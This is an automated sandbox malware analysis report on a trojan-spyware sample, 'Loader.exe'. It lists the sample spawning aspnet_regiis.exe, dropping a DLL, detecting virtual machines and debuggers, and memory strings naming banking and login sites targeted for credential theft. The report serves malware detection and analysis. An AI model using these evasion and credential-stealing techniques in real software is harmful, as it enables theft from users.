                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C397803_2_72C39780
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C577403_2_72C57740
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C427503_2_72C42750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C4DF503_2_72C4DF50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C46F523_2_72C46F52
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C55F1B3_2_72C55F1B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C597393_2_72C59739
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C504C63_2_72C504C6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C524E03_2_72C524E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C3D4F33_2_72C3D4F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C61CF03_2_72C61CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C44CA03_2_72C44CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C6A4403_2_72C6A440
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C4747D3_2_72C4747D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C63C103_2_72C63C10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C35DC03_2_72C35DC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C6A5D43_2_72C6A5D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C365F03_2_72C365F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C6CDF03_2_72C6CDF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C67DA93_2_72C67DA9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C5CD4C3_2_72C5CD4C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C5CD5E3_2_72C5CD5E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C545603_2_72C54560
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C6FD703_2_72C6FD70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C56D2E3_2_72C56D2E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C41D2B3_2_72C41D2B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C69D303_2_72C69D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C5C53C3_2_72C5C53C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 72C37F60 appears 40 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 72C44C90 appears 77 times
                Source: Loader.exe, 00000000.00000000.2011203087.0000000000BE4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMadisonBenjaminGrace.exerMbT vs Loader.exe
                Source: Loader.exe, 00000000.00000002.2016433799.000000000105E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Loader.exe
                Source: Loader.exeBinary or memory string: OriginalFilenameMadisonBenjaminGrace.exerMbT vs Loader.exe
                Source: Loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/2@11/2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C69280 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,3_2_72C69280
                Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Roaming\gdi32.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2272:120:WilError_03
                Source: Loader.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Loader.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\Loader.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: aspnet_regiis.exe, 00000003.00000003.2104540811.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104646012.0000000005C08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Loader.exeVirustotal: Detection: 48%
                Source: Loader.exeReversingLabs: Detection: 70%
                Source: unknownProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
                Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: Loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Loader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E7349 push 00000000h; retf 3_3_035E734D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E7349 push 00000000h; retf 3_3_035E734D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E7349 push 00000000h; retf 3_3_035E734D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E7349 push 00000000h; retf 3_3_035E734D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E7349 push 00000000h; retf 3_3_035E734D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E38E3 push 88000D00h; retf 3_3_035E38F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E38E3 push 88000D00h; retf 3_3_035E38F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E38E3 push 88000D00h; retf 3_3_035E38F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E38E3 push 88000D00h; retf 3_3_035E38F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E38E3 push 88000D00h; retf 3_3_035E38F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E391B push 88000E00h; retf 3_3_035E3920
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E391B push 88000E00h; retf 3_3_035E3920
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E391B push 88000E00h; retf 3_3_035E3920
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E391B push 88000E00h; retf 3_3_035E3920
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E391B push 88000E00h; retf 3_3_035E3920
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E7349 push 00000000h; retf 3_3_035E734D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E7349 push 00000000h; retf 3_3_035E734D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E7349 push 00000000h; retf 3_3_035E734D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E7349 push 00000000h; retf 3_3_035E734D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E7349 push 00000000h; retf 3_3_035E734D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E38E3 push 88000D00h; retf 3_3_035E38F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E38E3 push 88000D00h; retf 3_3_035E38F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E38E3 push 88000D00h; retf 3_3_035E38F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E38E3 push 88000D00h; retf 3_3_035E38F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E38E3 push 88000D00h; retf 3_3_035E38F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E391B push 88000E00h; retf 3_3_035E3920
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E391B push 88000E00h; retf 3_3_035E3920
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E391B push 88000E00h; retf 3_3_035E3920
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E391B push 88000E00h; retf 3_3_035E3920
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E391B push 88000E00h; retf 3_3_035E3920
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_035E7349 push 00000000h; retf 3_3_035E734D
                Source: Loader.exeStatic PE information: section name: .text entropy: 7.116320721076053
                Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Roaming\gdi32.dllJump to dropped file
                Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Query firmware table information (likely to detect VMs)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeMemory allocated: 2D20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeMemory allocated: 2FA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeMemory allocated: 2DC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Loader.exe TID: 5456Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 6696Thread sleep time: -150000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE53460 FindFirstFileExW,0_2_6CE53460
                Source: C:\Users\user\Desktop\Loader.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: aspnet_regiis.exe, 00000003.00000003.2128539472.0000000005CA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176809705.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243161469.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220561655.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2177101294.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243002308.000000000351C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2197972642.0000000003577000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: aspnet_regiis.exe, 00000003.00000003.2128539472.0000000005CA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: aspnet_regiis.exe, 00000003.00000003.2128699416.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI call chain: ExitProcess graph end nodegraph_3-15073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_72C6E110 LdrInitializeThunk,3_2_72C6E110
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE4F194 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CE4F194
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE51D62 mov eax, dword ptr fs:[00000030h]0_2_6CE51D62
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE52FA1 mov eax, dword ptr fs:[00000030h]0_2_6CE52FA1
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE4EC67 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6CE4EC67
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE4F194 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CE4F194
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6CE5167C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CE5167C
